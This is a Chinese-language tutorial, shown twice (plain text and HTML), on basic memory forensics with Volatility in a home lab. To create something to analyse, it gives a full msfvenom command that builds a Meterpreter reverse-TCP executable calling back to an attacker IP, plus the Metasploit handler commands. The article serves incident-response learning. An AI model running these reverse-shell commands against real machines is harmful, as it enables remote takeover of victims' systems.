使用Volatility进行简单的内存分析

红帽社区是一个垂直网络安全社区，融合“红帽先锋”正能量精神，每日分享最新安全资讯，提供安全问答、靶场、众测、漏洞库等功能，是网络安全爱好者学习、交流的优质社区。

Volatility下载地址
https://www.volatilityfoundation.org/releases
Dumplt下载地址
http://www.secist.com/wp-content/uploads/2016/11/DumpIt.zip
因为一次应急响应，大佬针对受害主机内存进行了详细的分析，所以我就萌生了浮现一遍分析过程的想法。
攻击机IP地址192.168.234.140（kali）
靶机IP地址 192.168.234.141（win7）
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.234.140 lport=4433 -f exe -o shell.exe
首先生成一个恶意反连文件

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.234.140
set LPORT 4433
exploit

这时候需要将恶意文件拷贝到靶机中运行
然后使用dumplt 生成.raw文件（这里内存有多大生成的文件就有多大）

接下来就是使用Volatility针对该文件进行分析
（PS：不是我不用kali是里面的装不好）

使用imageinfo识别应该使用的配置文件
识别出来的Win7SP1x64符合靶机情况

使用netscan查看内存中进程的网络连接情况

进程号2864有明显的外连行为
使用procdump对该进程dump

刚dump一瞬间就触发了windows defender告警
将文件放到https://www.virustotal.com/上识别

将文件使用IDA分析

这就完成了简单的内存分析，我只是个小菜鸟，希望以后每次应急都有新的收获。
PS：再提一下使用ms17-010正在进行攻击的时候内存dump是检查不到恶意进程的

<p>Volatility下载地址<br /> https://www.volatilityfoundation.org/releases<br /> Dumplt下载地址<br /> http://www.secist.com/wp-content/uploads/2016/11/DumpIt.zip<br /> 因为一次应急响应，大佬针对受害主机内存进行了详细的分析，所以我就萌生了浮现一遍分析过程的想法。<br /> 攻击机IP地址192.168.234.140（kali）<br /> 靶机IP地址 192.168.234.141（win7）<br /> msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.234.140 lport=4433 -f exe -o shell.exe<br /> 首先生成一个恶意反连文件<br /> <img src="https://www.redhatzone.com/img/sin/M00/00/21/wKg0C16YTniAMgtwAABYpaAOkaw967.png" alt="10.png" /><br /> use exploit/multi/handler<br /> set payload windows/meterpreter/reverse_tcp<br /> set LHOST 192.168.234.140<br /> set LPORT 4433<br /> exploit<br /> <img src="https://www.redhatzone.com/img/sin/M00/00/21/wKg0C16YTn6AL-kVAACtjLekmqw138.png" alt="11.png" /><br /> 这时候需要将恶意文件拷贝到靶机中运行<br /> 然后使用dumplt 生成.raw文件（这里内存有多大生成的文件就有多大）<br /> <img src="https://www.redhatzone.com/img/sin/M00/00/21/wKg0C16YToeAe772AACu07GBmGc827.png" alt="12.png" /><br /> 接下来就是使用Volatility针对该文件进行分析<br /> （PS：不是我不用kali是里面的装不好）<br /> <img src="https://www.redhatzone.com/img/sin/M00/00/21/wKg0C16YTo2AL9EhAAB82l-qlKQ009.png" alt="13.png" /><br /> 使用imageinfo识别应该使用的配置文件<br /> 识别出来的Win7SP1x64符合靶机情况<br /> <img src="https://www.redhatzone.com/img/sin/M00/00/21/wKg0C16YTpOAOPdIAAEFeNhjeJM398.png" alt="14.png" /><br /> 使用netscan查看内存中进程的网络连接情况<br /> <img src="https://www.redhatzone.com/img/sin/M00/00/21/wKg0C16YTqCABxb3AAEuc6L5aAE629.jpg" alt="15.jpg" /><br /> 进程号2864有明显的外连行为<br /> 使用procdump对该进程dump<br /> <img src="https://www.redhatzone.com/img/sin/M00/00/21/wKg0C16YTqmAWCQvAAApBuvWQ6I894.jpg" alt="16.jpg" /><br /> 刚dump一瞬间就触发了windows defender告警<br /> 将文件放到https://www.virustotal.com/上识别<br /> <img src="https://www.redhatzone.com/img/sin/M00/00/21/wKg0C16YTrKAIJbRAABzg2MAj_4791.jpg" alt="17.jpg" /><br /> 将文件使用IDA分析<br /> <img src="https://www.redhatzone.com/img/sin/M00/00/21/wKg0C16YTrmAfM3zAAD6xfmnL7I687.png" alt="18.png" /><br /> 这就完成了简单的内存分析，我只是个小菜鸟，希望以后每次应急都有新的收获。<br /> PS：再提一下使用ms17-010正在进行攻击的时候内存dump是检查不到恶意进程的</p>